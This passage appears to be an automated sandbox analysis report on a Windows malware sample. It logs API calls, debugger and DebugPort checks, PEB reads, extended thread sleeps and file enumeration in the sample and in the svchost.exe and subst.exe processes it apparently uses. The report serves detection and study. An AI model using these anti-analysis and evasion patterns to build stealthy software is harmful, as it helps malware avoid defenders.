            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\subst.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\subst.exe TID: 7872Thread sleep count: 215 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\subst.exe TID: 7872Thread sleep time: -430000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\subst.exe TID: 7872Thread sleep count: 9756 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\subst.exe TID: 7872Thread sleep time: -19512000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe TID: 7896Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe TID: 7896Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe TID: 7896Thread sleep time: -57000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe TID: 7896Thread sleep count: 41 > 30Jump to behavior
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe TID: 7896Thread sleep time: -41000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\subst.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_00204696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00204696
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0020C93C FindFirstFileW,FindClose,0_2_0020C93C
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0020C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0020C9C7
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0020F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0020F200
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0020F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0020F35D
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0020F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0020F65E
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_00203A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00203A2B
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_00203D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00203D4E
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0020BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0020BF27
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0084BCA0 FindFirstFileW,FindNextFileW,FindClose,4_2_0084BCA0
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001A4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001A4AFE
            Source: UJCHZIamnVz.exe, 00000007.00000002.4162644558.000000000117F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
            Source: subst.exe, 00000004.00000002.4162582023.0000000002C80000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2255444303.0000018CEB51E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeAPI call chain: ExitProcess graph end nodegraph_0-97739
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeAPI call chain: ExitProcess graph end nodegraph_0-97914
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7096E rdtsc 1_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417473 LdrLoadDll,1_2_00417473
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_002141FD BlockInput,0_2_002141FD
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001A3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_001A3B4C
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001D5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_001D5CCC
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0021C304 LoadLibraryA,GetProcAddress,0_2_0021C304
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_034D3470 mov eax, dword ptr fs:[00000030h]0_2_034D3470
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_034D34D0 mov eax, dword ptr fs:[00000030h]0_2_034D34D0
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_034D1E70 mov eax, dword ptr fs:[00000030h]0_2_034D1E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]1_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]1_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]1_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]1_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]1_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]1_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h]1_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h]1_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B663FF mov eax, dword ptr fs:[00000030h]1_2_03B663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h]1_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h]1_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]1_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h]1_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD43D4 mov eax, dword ptr fs:[00000030h]1_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD43D4 mov eax, dword ptr fs:[00000030h]1_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEC3CD mov eax, dword ptr fs:[00000030h]1_2_03BEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]1_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]1_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]1_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]1_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB63C0 mov eax, dword ptr fs:[00000030h]1_2_03BB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0634F mov eax, dword ptr fs:[00000030h]1_2_03C0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C310 mov ecx, dword ptr fs:[00000030h]1_2_03B2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B50310 mov ecx, dword ptr fs:[00000030h]1_2_03B50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]1_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]1_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]1_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD437C mov eax, dword ptr fs:[00000030h]1_2_03BD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov ecx, dword ptr fs:[00000030h]1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFA352 mov eax, dword ptr fs:[00000030h]1_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD8350 mov ecx, dword ptr fs:[00000030h]1_2_03BD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h]1_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h]1_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C062D6 mov eax, dword ptr fs:[00000030h]1_2_03C062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h]1_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h]1_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]1_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]1_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]1_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]1_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]1_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]1_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2823B mov eax, dword ptr fs:[00000030h]1_2_03B2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]1_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]1_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]1_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2826B mov eax, dword ptr fs:[00000030h]1_2_03B2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A250 mov eax, dword ptr fs:[00000030h]1_2_03B2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36259 mov eax, dword ptr fs:[00000030h]1_2_03B36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEA250 mov eax, dword ptr fs:[00000030h]1_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEA250 mov eax, dword ptr fs:[00000030h]1_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB8243 mov eax, dword ptr fs:[00000030h]1_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB8243 mov ecx, dword ptr fs:[00000030h]1_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]1_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]1_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]1_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]1_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C061E5 mov eax, dword ptr fs:[00000030h]1_2_03C061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B70185 mov eax, dword ptr fs:[00000030h]1_2_03B70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h]1_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h]1_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD4180 mov eax, dword ptr fs:[00000030h]1_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD4180 mov eax, dword ptr fs:[00000030h]1_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B601F8 mov eax, dword ptr fs:[00000030h]1_2_03B601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF61C3 mov eax, dword ptr fs:[00000030h]1_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF61C3 mov eax, dword ptr fs:[00000030h]1_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B60124 mov eax, dword ptr fs:[00000030h]1_2_03B60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04164 mov eax, dword ptr fs:[00000030h]1_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04164 mov eax, dword ptr fs:[00000030h]1_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA118 mov ecx, dword ptr fs:[00000030h]1_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]1_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]1_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]1_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF0115 mov eax, dword ptr fs:[00000030h]1_2_03BF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]1_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C156 mov eax, dword ptr fs:[00000030h]1_2_03B2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC8158 mov eax, dword ptr fs:[00000030h]1_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36154 mov eax, dword ptr fs:[00000030h]1_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36154 mov eax, dword ptr fs:[00000030h]1_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov ecx, dword ptr fs:[00000030h]1_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]1_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF60B8 mov eax, dword ptr fs:[00000030h]1_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B280A0 mov eax, dword ptr fs:[00000030h]1_2_03B280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC80A8 mov eax, dword ptr fs:[00000030h]1_2_03BC80A8
